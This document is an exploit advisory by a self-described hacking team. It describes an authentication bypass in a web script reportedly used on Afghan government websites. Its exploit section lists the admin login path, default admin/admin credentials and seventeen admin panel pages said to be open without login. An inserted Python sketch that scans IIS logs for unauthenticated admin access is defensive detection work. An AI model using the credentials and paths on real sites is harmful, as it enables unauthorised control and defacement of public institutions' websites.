####################################################################
# Exploit Title : Obaidullah Sulaimankhil Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 03/03/2019
# Vendor Homepage / Social Media : facebook.com/obaidullah.sulaimankhil
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
CWE-287 [ Improper Authentication ]
CWE-592 [ Authentication Bypass Issues ]
CWE-305 [ Authentication Bypass by Primary Weakness ]
CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ]
CWE-302 [ Authentication Bypass by Assumed-Immutable Data ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Information about Software and Owner :
************************************
Obaidullah SulaimanKhil is a web developer in Afghanistan who developed
a script under his name, Obaidullah Software, for Afghan government websites.
####################################################################
# Impact :
**********
* When an actor claims to have a given identity, the software does not prove or insufficiently
proves that the claim is correct.
* The authentication algorithm is sound, but the implemented mechanism can be bypassed
as the result of a separate weakness that is primary to the authentication error.
* This product requires authentication, but the product has an alternate path or
channel that does not require authentication.
* The authentication scheme or implementation uses key data elements that are assumed
to be immutable, but can be controlled or modified by the attacker.
####################################################################
# Authentication Bypass Exploit :
*****************************
Admin Panel Login Path :
***********************
/Pages/AdminLogin.aspx
Admin username : admin
Admin password : admin
Usable Admin Control Panel Links :
********************************
/Pages/frmWelcomeMessageAdmin.aspx
/Pages/HistoryOfDMTVETAdmin.aspx
/Pages/AboutDMTVETAdmin.aspx
/Pages/HEDMAdmin.aspx
/Pages/frmStaffAdmin.aspx
/Pages/frmCeoMessageAdmin.aspx
/Pages/frmSliderAdmin.aspx
/Pages/frmDMTVETStructureAdmin.aspx
/Pages/frmDMTVETReport.aspx
/Pages/frmArticlesAdmin.aspx
/Pages/frmVisionAdmin.aspx
/Pages/frmPresentationsAdmin.aspx
/Pages/frmInterviewsAdmin.aspx
/Pages/frmAlbumAdmin.aspx
/Pages/frmNewsAdmin.aspx
/Pages/frmOthersAdmin.aspx
/Pages/frmContactUsAdmin.aspx
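Detection sketch for site operators (added example, not part of the original advisory or the vendor's code): it scans an IIS W3C log for the admin pages listed above being served with status 200 to a client that has no earlier successful login in the same log. Assumptions: a successful login answers the POST to /Pages/AdminLogin.aspx with a 302 redirect, clients are told apart by IP address only, and the log lines are constructed sample data.

```python
import re

# Admin pages named in the advisory: anything ending in "Admin.aspx" under
# /Pages/, plus frmDMTVETReport.aspx, which does not follow that pattern.
ADMIN_PAGE = re.compile(r"^/Pages/(\w*Admin\.aspx|frmDMTVETReport\.aspx)$", re.I)
LOGIN_PAGE = "/pages/adminlogin.aspx"

# Constructed IIS W3C log sample (documentation-range client addresses).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2019-03-03 10:00:01 GET /Pages/AdminLogin.aspx 192.0.2.10 200
2019-03-03 10:00:09 POST /Pages/AdminLogin.aspx 192.0.2.10 302
2019-03-03 10:00:10 GET /Pages/frmNewsAdmin.aspx 192.0.2.10 200
2019-03-03 10:05:00 GET /Pages/frmSliderAdmin.aspx 198.51.100.7 200
2019-03-03 10:05:02 POST /Pages/frmSliderAdmin.aspx 198.51.100.7 200
2019-03-03 10:06:00 GET /Pages/frmDMTVETReport.aspx 203.0.113.5 302
2019-03-03 10:07:00 GET /Pages/Default.aspx 203.0.113.5 200
"""

def unauthenticated_admin_hits(log_text):
    """Return (timestamp, client, page) for each admin page served with 200
    to a client that has no earlier successful login in the log."""
    fields, logged_in, hits = [], set(), []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column names for the lines that follow
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue                    # malformed or truncated entry
        rec = dict(zip(fields, parts))
        page, client = rec["cs-uri-stem"], rec["c-ip"]
        # Assumption: a successful login answers the POST with a 302 redirect.
        if (page.lower() == LOGIN_PAGE and rec["cs-method"] == "POST"
                and rec["sc-status"] == "302"):
            logged_in.add(client)
        elif (ADMIN_PAGE.match(page) and rec["sc-status"] == "200"
                and client not in logged_in):
            hits.append((rec["date"] + " " + rec["time"], client, page))
    return hits

if __name__ == "__main__":
    for hit in unauthenticated_admin_hits(SAMPLE_LOG):
        print("admin page served without prior login:", *hit)
```

A login made with the default admin/admin account looks like any other successful login in these logs, so this check covers only the direct-access path; the default password still has to be changed.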
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################